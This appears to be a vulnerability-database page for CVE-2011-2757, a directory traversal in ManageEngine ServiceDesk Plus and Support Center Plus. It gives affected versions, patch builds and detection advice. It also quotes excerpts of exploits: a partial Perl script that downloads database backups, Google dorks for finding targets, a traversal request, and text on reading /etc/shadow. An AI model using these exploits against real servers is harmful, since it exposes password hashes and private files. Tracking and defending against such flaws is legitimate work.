CVE-2011-2757
published 2011-07-17CVE-2011-2757: Directory traversal vulnerability in FileDownload.jsp in ManageEngine ServiceDesk Plus 8.0.0.12 and earlier allows remote attackers to read arbitrary files via…
PriorityP345medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
39.37%
98.4th percentile
Directory traversal vulnerability in FileDownload.jsp in ManageEngine ServiceDesk Plus 8.0.0.12 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the FILENAME parameter. NOTE: this might overlap the US-CERT VU#543310 issue.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| manageengine | servicedesk_plus | <= 8.0.0.12 | — |
| manageengine | servicedesk_plus | — | — |
| manageengine | servicedesk_plus | — | — |
| manageengine | servicedesk_plus | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- ·The vulnerability affects ManageEngine ServiceDesk Plus build 9110 and lower per the Metasploit module, but the NVD entry and original exploits reference version 8.0.0.12 and earlier — ensure detection coverage spans both version ranges. ↗
- ·The vulnerability also affects ManageEngine Support Center Plus (not just ServiceDesk Plus); detection rules should cover both products' /workorder/FileDownload.jsp endpoints. ↗
- ·On Windows, exploitation can yield SYSTEM-level file reads; on Linux, root-level file reads are possible if the service runs as root — severity of detections should reflect privilege context. ↗
- ·The fix for ServiceDesk Plus was released as Service Pack Build 8012; the fix for Support Center Plus was released as patch 7803 — verify patched build numbers when triaging alerts. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
exploitdb·2011-07-07
CVE-2011-2757 ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
---
# Exploit Title: ManageEngine ServiceDesk new();
$url="http://127.0.0.1";
$path="/workorder/FileDownload.jsp";
$installPath=&getInstallPathWin($url,$path);
if ($installPath ne "") {
@backups=&getServerOutLogs($url,$path,$installPath);
} else {
print "Install path not found :(\n";
exit();
}
if (scalar(@backups)>0) {
print "hehe.. We got paths to backup files..\n If they are
on the same drive and exists - we will own their world!!\n";
foreach $backLine (@backups) {
@backInfo=split(/ --- /,$backLine);
#print "Trying to download $backInfo[1] from
$backInfo[0]...\n";
&downloadBackups($url,$path,$backLine);
}
}
unlink("bad");
print "Dude, check out \'db_backups.html\'\n";
sub downloadBackups {
my ($url,$path
Exploit-DB
ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
exploitdb·2011-06-23
CVE-2011-2757 ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
---
Google Dork: ie: intitle:ManageEngine ServiceDesk Plus"
Author: Keith Lee ([email protected]), @keith55,
http://milo2012.wordpress.com
Software Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
Version: 8.0
Description:
Directory traversal vulnerabilities has been found in ManageEngine
ServiceDesk Plus 8.0 a web
based helpdesk system written in Java.
The vulnerability can be exploited to access local files by entering
special characters in variables used to create file paths. The attackers
use �../� sequences to move up to root directory, thus permitting
navigation through the file system.
Request:
GET http://[webserver
IP]:8080/workorder/FileDownload.jsp?module=agent&&F
Exploit-DB
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
exploitdb·2011-06-23
CVE-2011-2757 ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
---
Advisory:
ManageEngine Support Center Plus 7.8 build 0x90.nl
Software link:
http://www.manageengine.com/products/support-center/download.html
Tested on:
Linux & Windows
Category:
Directory Traversal
Severity:
High
Google Dork: intitle:ManageEngine SupportCenter Plus
Description:
It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
Requests Linux:
Grab the /etc/passwd & /etc/shado
Metasploit
ManageEngine ServiceDesk Plus Path Traversal
metasploit
ManageEngine ServiceDesk Plus Path Traversal
ManageEngine ServiceDesk Plus Path Traversal
This module exploits an unauthenticated path traversal vulnerability found in ManageEngine ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem with the same privileges as Support Center Plus is running. On Windows, files can be retrieved with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).
No writeups or analysis indexed.
2011-07-17
Published